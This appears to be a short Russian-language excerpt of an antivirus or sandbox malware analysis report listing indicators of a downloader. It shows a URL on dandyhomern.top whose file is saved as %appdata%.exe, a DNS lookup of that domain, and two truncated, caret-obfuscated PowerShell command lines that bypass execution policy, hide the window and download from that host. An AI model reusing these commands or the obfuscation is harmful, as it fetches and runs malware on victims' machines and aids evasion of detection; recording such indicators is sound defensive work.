Техническая информация
- http://www.dandyhomern.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POw^eRShELl^.eX^e -Ex^ECuT^iOn^PO^liC^y b^Ypas^s -no^PROFI^LE^ -^wI^N^D^O^ws^tY^Le HIddeN^ ^(^N^e^W-^oBjE^CT^ ^SYSteM.N^e^T^.Web^c^l^IeN^T).dOW^Nl^o^a^DfILE(^'http://www.dandy...
- DNS ASK da###homern.top
- '<SYSTEM32>\cmd.exe' /C "POw^eRShELl^.eX^e -Ex^ECuT^iOn^PO^liC^y b^Ypas^s -no^PROFI^LE^ -^wI^N^D^O^ws^tY^Le HIddeN^ ^(^N^e^W-^oBjE^CT^ ^SYSteM.N^e^T^.Web^c^l^IeN^T).dOW^Nl^o^a^DfILE(^'http://www.dandy...' (со скрытым окном)